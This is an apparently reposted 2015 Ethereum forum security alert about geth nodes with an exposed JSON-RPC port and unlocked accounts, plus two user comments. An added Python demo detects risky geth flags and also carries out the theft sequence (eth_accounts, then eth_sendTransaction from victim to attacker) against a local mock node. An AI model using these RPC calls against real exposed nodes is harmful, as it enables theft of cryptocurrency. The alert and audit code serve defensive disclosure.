**Security Alert: Insecurely configured geth with no firewall and unlocked accounts can lead to funds being accessed remotely by attackers**

GeorgeHallam, Member, Administrator, Moderator, Posts: 229, admin
Security Alert – Insecurely configured geth can make funds remotely accessible

Posted by Jutta Steiner on August 29th, 2015.
Insecurely configured geth with no firewall and unlocked accounts can lead to funds being accessed remotely by attackers

Affected implementation: Issue reported for geth, though all implementations, including C++ and Python, can in principle display this behavior if used insecurely; only nodes which leave the JSON-RPC port open to an attacker are affected (this precludes most nodes on internal networks behind NAT).

Likelihood: Medium

Severity: High

Impact: Loss of funds related to wallets imported or generated in clients

Details: The RPC allows you to send transactions from any account which has been unlocked prior to sending a transaction, and an unlocked account stays unlocked for the entirety of the session. By default, RPC is accessible only from the same host on which geth is running. By opening the RPC to be accessed by anyone on the internet without a firewall rule in place, you open up your wallet to theft by anybody who knows your address in combination with your IP.

Effects on expected chain reorganisation depth: none

Remedial action taken by Ethereum: eth RC1 will be fully secure by requiring explicit user-authorisation for any potentially remote transaction. Later versions of geth may support this functionality.

Proposed temporary workaround: Ensure you have a firewall in place on the JSON-RPC port (default 8545) to prevent attackers from using the RPC.

Alternative, secondary workaround: Never unlock any accounts.

Alternative workaround (geth only): Do not use the --rpccorsdomain option

Fix: TBD

For updates, please refer to this blog post: https://blog.ethereum.org/2015/08/29/security-alert-insecurely-configured-geth-can-make-funds-remotely-accessible/
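The alert describes the attack in prose only. The following is an added example (not code from the Ethereum project or from the alert's author) that shows both halves of it: a check of a geth command line for the flag combination named in the alert and in the comments below (`--rpc`, `--rpcaddr 0.0.0.0`, `--rpccorsdomain`), and the two JSON-RPC calls a remote attacker needs against an exposed node, `eth_accounts` to learn the addresses and `eth_sendTransaction` to move ether out of an unlocked one. The node is a constructed in-process mock that behaves like a misconfigured geth with one unlocked account; the victim and attacker addresses, the mock's responses and the loopback URL are all placeholders for this demo and are not taken from the page.

```python
"""Added example: reproduce the JSON-RPC exposure from the alert against a
constructed mock node, and flag the risky geth flags. Not Ethereum code."""
import json
import shlex
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

VICTIM = "0x" + "11" * 20      # constructed placeholder addresses
ATTACKER = "0x" + "22" * 20


def geth_cmdline_exposure(cmdline):
    """Findings for the flag combination named in the alert and comments:
    --rpc enabled, --rpcaddr on all interfaces, --rpccorsdomain set at all.
    geth's defaults (no --rpc; --rpcaddr 127.0.0.1) are treated as safe."""
    args = shlex.split(cmdline)
    if "--rpc" not in args:
        return []                       # RPC is off: nothing to reach
    rpcaddr, cors = "127.0.0.1", None
    for i, a in enumerate(args):
        if a == "--rpcaddr" and i + 1 < len(args):
            rpcaddr = args[i + 1]
        elif a.startswith("--rpcaddr="):
            rpcaddr = a.split("=", 1)[1]
        elif a == "--rpccorsdomain" and i + 1 < len(args):
            cors = args[i + 1]
        elif a.startswith("--rpccorsdomain="):
            cors = a.split("=", 1)[1]
    findings = []
    if rpcaddr in ("0.0.0.0", "::"):
        findings.append("rpc bound to all interfaces (--rpcaddr %s)" % rpcaddr)
    if cors is not None:
        findings.append("web pages on %s may call the rpc (--rpccorsdomain)" % cors)
    return findings


def rpc_call(url, method, params=None):
    """Minimal JSON-RPC 2.0 client; an attacker needs nothing more."""
    body = json.dumps({"jsonrpc": "2.0", "id": 1,
                       "method": method, "params": params or []}).encode()
    req = urllib.request.Request(url, data=body,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return json.loads(resp.read().decode())


def audit_node(url):
    """Audit view: if a peer at this URL can list accounts, it can also try
    eth_sendTransaction from each one, which succeeds for unlocked ones."""
    accounts = rpc_call(url, "eth_accounts").get("result", [])
    return {"accounts": accounts, "exposed": bool(accounts)}


class MockNode(BaseHTTPRequestHandler):
    """Constructed stand-in for a misconfigured node with VICTIM unlocked.
    It records eth_sendTransaction calls instead of signing anything."""
    sent = []

    def do_POST(self):
        req = json.loads(self.rfile.read(int(self.headers["Content-Length"])))
        if req["method"] == "eth_accounts":
            result = [VICTIM]
        elif req["method"] == "eth_sendTransaction":
            MockNode.sent.append(req["params"][0])
            result = "0x" + "ab" * 32          # fake transaction hash
        else:
            result = None
        out = json.dumps({"jsonrpc": "2.0", "id": req["id"],
                          "result": result}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(out)))
        self.end_headers()
        self.wfile.write(out)

    def log_message(self, *args):     # keep the demo quiet
        pass


def run_demo():
    """Start the mock on a loopback port, audit it, then issue the exact
    call a remote attacker would: move 1 ether from VICTIM to ATTACKER."""
    srv = HTTPServer(("127.0.0.1", 0), MockNode)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    url = "http://127.0.0.1:%d" % srv.server_address[1]
    try:
        report = audit_node(url)
        theft = {"from": VICTIM, "to": ATTACKER, "value": hex(10 ** 18)}
        tx_hash = rpc_call(url, "eth_sendTransaction", [theft])["result"]
        report["theft_accepted"] = tx_hash is not None and MockNode.sent[-1] == theft
    finally:
        srv.shutdown()
    return report


if __name__ == "__main__":
    print(geth_cmdline_exposure("geth --rpc --rpcaddr 0.0.0.0 --rpccorsdomain '*'"))
    print(run_demo())
```

Against a real node the `eth_sendTransaction` call only succeeds for an account that is currently unlocked, which is why the alert's secondary workaround (never unlock accounts) closes the hole even with the port reachable; the firewall workaround removes the attacker's ability to make the first call at all.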

Comments

  • StephanTual, London, England, Member, Moderator, Posts: 1,282, mod
    edited August 2015
    This only affects you if you have RPC on (i.e., run geth with --rpc) AND unlock the account AND have no firewall at all (i.e., you have configured your router to map the port) AND have --rpcaddr set to "0.0.0.0".

    You'd have to go out of your way for this to happen; it's a bit like saying "If you open up port 80 on your firewall and your Mac, and have installed Apache and have started the service, then people can browse webpages on your computer".
  • dny1234, Member, Posts: 1
    The impact is a little more serious than people browsing webpages. More like accessing your online banking if you've logged in. Multiple people have lost their money this way.